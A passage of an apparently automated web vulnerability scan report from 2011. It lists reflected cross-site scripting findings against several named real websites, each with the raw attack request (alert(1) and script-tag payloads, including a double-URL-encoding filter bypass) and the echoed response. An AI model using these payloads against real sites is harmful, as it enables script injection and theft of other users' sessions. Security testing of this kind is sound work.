Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56151
Vary: Accept-Encoding
Cache-Control: public, max-age=562
Expires: Fri, 01 Apr 2011 18:20:02 GMT
Date: Fri, 01 Apr 2011 18:10:40 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeContent.aspxf48c2';6f5ee646a27/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.104. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b61d'%3b29e3180e9f2 was submitted in the REST URL parameter 1. This input was echoed as 9b61d';29e3180e9f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content9b61d'%3b29e3180e9f2/ServeResource.aspx?id=687&ticks=1202993762 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1202993762
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56111
Vary: Accept-Encoding
Cache-Control: public, max-age=561
Expires: Fri, 01 Apr 2011 18:20:02 GMT
Date: Fri, 01 Apr 2011 18:10:41 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content9b61d';29e3180e9f2/ServeResource.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.105. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8609'%3b7b5c8f42fb7 was submitted in the REST URL parameter 2. This input was echoed as d8609';7b5c8f42fb7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeResource.aspxd8609'%3b7b5c8f42fb7?id=687&ticks=1202993762 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1202993762
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56157
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:46 GMT
Date: Fri, 01 Apr 2011 18:10:46 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeResource.aspxd8609';7b5c8f42fb7/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.106. http://www.ny1.com/favicon.ico [80003'-alert(1)-'46fe3f653ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ny1.com
Path:   /favicon.ico

Issue detail

The value of the 80003'-alert(1)-'46fe3f653ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2899d'-alert(1)-'c21f3904534 was submitted in the 80003'-alert(1)-'46fe3f653ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?80003'-alert(1)-'46fe3f653ad=12899d'-alert(1)-'c21f3904534 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56138
Vary: Accept-Encoding
Cache-Control: public, max-age=590
Expires: Fri, 01 Apr 2011 18:20:55 GMT
Date: Fri, 01 Apr 2011 18:11:05 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/favicon.ico?80003'-alert(1)-'46fe3f653ad=12899d'-alert(1)-'c21f3904534'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.107. http://www.ny1.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f09d'%3b2cbc36dd419 was submitted in the REST URL parameter 1. This input was echoed as 2f09d';2cbc36dd419 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico2f09d'%3b2cbc36dd419 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ny1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 15:47:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56403
Vary: Accept-Encoding
Cache-Control: public, max-age=571
Expires: Fri, 01 Apr 2011 15:57:09 GMT
Date: Fri, 01 Apr 2011 15:47:38 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/favicon.ico2f09d';2cbc36dd419/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.108. http://www.ny1.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ny1.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80003'-alert(1)-'46fe3f653ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?80003'-alert(1)-'46fe3f653ad=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ny1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 15:47:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56353
Vary: Accept-Encoding
Cache-Control: public, max-age=592
Expires: Fri, 01 Apr 2011 15:57:21 GMT
Date: Fri, 01 Apr 2011 15:47:29 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/favicon.ico?80003'-alert(1)-'46fe3f653ad=1'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.109. http://www.ottawacitizen.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ottawacitizen.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19e72'%3b535a1938ce9 was submitted in the REST URL parameter 1. This input was echoed as 19e72';535a1938ce9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /19e72'%3b535a1938ce9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ottawacitizen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 15:39:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 15:39:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130661


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/ccn.com/19e72';535a1938ce9/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=19e72';535a1938ce9;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93713010?">
...[SNIP]...

2.110. http://www.quickyellow.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quickyellow.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0f13<script>alert(1)</script>b6b93a36579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quickyellow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Date: Fri, 01 Apr 2011 16:32:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.quickyellow.com/favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1
Content-Length: 285
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1><p>You don't have permission to access http://www.quickyellow.com/favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1
on this server.</p>
...[SNIP]...

2.111. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage1.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 360a1%253cscript%253ealert%25281%2529%253c%252fscript%253efe66127eeb4 was submitted in the REST URL parameter 1. This input was echoed as 360a1<script>alert(1)</script>fe66127eeb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico360a1%253cscript%253ealert%25281%2529%253c%252fscript%253efe66127eeb4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 01 Apr 2011 17:25:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico360a1<script>alert(1)</script>fe66127eeb4<br>
...[SNIP]...

2.112. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage1.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 644d8<script>alert(1)</script>c65e2d87a48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?644d8<script>alert(1)</script>c65e2d87a48=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 01 Apr 2011 17:25:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico?644d8<script>alert(1)</script>c65e2d87a48=1<br>
...[SNIP]...

2.113. http://www.viagra.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.viagra.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebdb6'%3b238a37bb66d was submitted in the REST URL parameter 1. This input was echoed as ebdb6';238a37bb66d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoebdb6'%3b238a37bb66d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viagra.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 17076
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 01 Apr 2011 15:49:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>
       40
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName='http://www.viagra.com/Redirect.aspx?404;http://www.viagra.com:80/favicon.icoebdb6';238a37bb66d';
s.pageType='errorPage';
s.prop1='page error';
s.prop3='error:404';
s.prop5='';
/* Conversion Variables */
s.campaign='';
s.events='7:pageview';
s.eVar3='error:404';
s.eVar5='';
s.eVar6='';
s.eVar18=
...[SNIP]...

2.114. http://www.viagra.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viagra.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92bef'-alert(1)-'af112dd110f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?92bef'-alert(1)-'af112dd110f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viagra.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 17089
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 01 Apr 2011 15:49:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>
       40
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName='http://www.viagra.com/Redirect.aspx?404;http://www.viagra.com:80/favicon.ico?92bef'-alert(1)-'af112dd110f=1';
s.pageType='errorPage';
s.prop1='page error';
s.prop3='error:404';
s.prop5='';
/* Conversion Variables */
s.campaign='';
s.events='7:pageview';
s.eVar3='error:404';
s.eVar5='';
s.eVar6='';
s.eVar1
...[SNIP]...

2.115. http://community.dogpile.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.dogpile.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f6b4"-alert(1)-"d53f37e00db was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: community.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.168f6b4"-alert(1)-"d53f37e00db
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:01 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 17:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Set-Cookie: RescueUserProfile=AnonymousId=54FD7D1F4FCE244B9E8E2E6C78C4AD06; expires=Mon, 29-Mar-2021 17:12:13 GMT; path=/; domain=rescue.dogpile.com
Set-Cookie: RescueSession=ActionId=578B1FBDAF35A73DAC17A778A44C4092&SessionId=B63CD17302B6DFC9486F33ED8B8928F7; expires=Fri, 01-Apr-2011 17:32:13 GMT; path=/; domain=rescue.dogpile.com
Last-Modified: Fri, 1 Apr 2011 17:12:13 GMT
Expires: Fri, 1 Apr 2011 17:12:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Dogpi
...[SNIP]...
<![CDATA[
   var userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.168f6b4"-alert(1)-"d53f37e00db";
   var clientIP = "173.193.214.243";
   // ]]>
...[SNIP]...

2.116. http://support.dogpile.com/pressroom/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.dogpile.com
Path:   /pressroom/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e495"-alert(1)-"9bf1c96b7b6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pressroom/ HTTP/1.1
Host: support.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.163e495"-alert(1)-"9bf1c96b7b6
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:01 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 17:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Set-Cookie: RescueUserProfile=AnonymousId=042912B6EF477475A9F8C372FEAD0737; expires=Mon, 29-Mar-2021 17:12:14 GMT; path=/; domain=rescue.dogpile.com
Set-Cookie: RescueSession=ActionId=54FE83B861E3A963BB99A255C9D1979A&SessionId=E801149D4CBCD3E8143E4A98AE2C088E; expires=Fri, 01-Apr-2011 17:32:14 GMT; path=/; domain=rescue.dogpile.com
Last-Modified: Fri, 1 Apr 2011 17:12:15 GMT
Expires: Fri, 1 Apr 2011 17:12:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Do
...[SNIP]...
<![CDATA[
   var userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.163e495"-alert(1)-"9bf1c96b7b6";
   var clientIP = "173.193.214.243";
   // ]]>
...[SNIP]...

2.117. http://www.blacksingles.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blacksingles.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c01b6"%3balert(1)//507cc18a657 was submitted in the Referer HTTP header. This input was echoed as c01b6";alert(1)//507cc18a657 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blacksingles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=c01b6"%3balert(1)//507cc18a657

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:32:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: al-amho=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: al-juso=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: SparkUPS=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: OmnitureSessionCheck=2011-04-01 09:32:37Z; path=/
Set-Cookie: REG091202=REG091202&prm=55020&ScenarioFile=/Applications/Registration/XML/SplashRegistration_9051.xml&ScenarioName=Scenario 22&LAST_COMPLETED_STEP=0&CURRENT_STEP=1&SESSION_ID=29782a70-8f42-4bb3-a5f5-0c42294bfb13&START_STEP_ID=1; expires=Sun, 01-May-2011 16:32:37 GMT; path=/
Set-Cookie: mnc5=sid=29782a70-8f42-4bb3-a5f5-0c42294bfb13; domain=.BlackSingles.com; expires=Sun, 01-Apr-2012 16:32:37 GMT; path=/
Set-Cookie: mnc5_PromotionID=objname=PromotionID&sliding=False&val=66301&days=3&dateExp=4%2f4%2f2011+9%3a32%3a37+AM&hash=gXZmZd7YT%2fuF4ppEcafsAw%3d%3d; domain=.BlackSingles.com; expires=Mon, 04-Apr-2011 16:32:37 GMT; path=/
Set-Cookie: mnc5_Luggage=objname=Luggage&sliding=False&val=%3fhl%3den%26q%3dc01b6%2522%253balert(1)%2f%2f507cc18a657&days=3&dateExp=4%2f4%2f2011+9%3a32%3a37+AM&hash=shTvH9IZSFK0Xxy2wxFwsA%3d%3d; domain=.BlackSingles.com; expires=Mon, 04-Apr-2011 16:32:37 GMT; path=/
Cache-Control: no-store
Content-Type: text/html; charset=utf-8
Content-Length: 72510
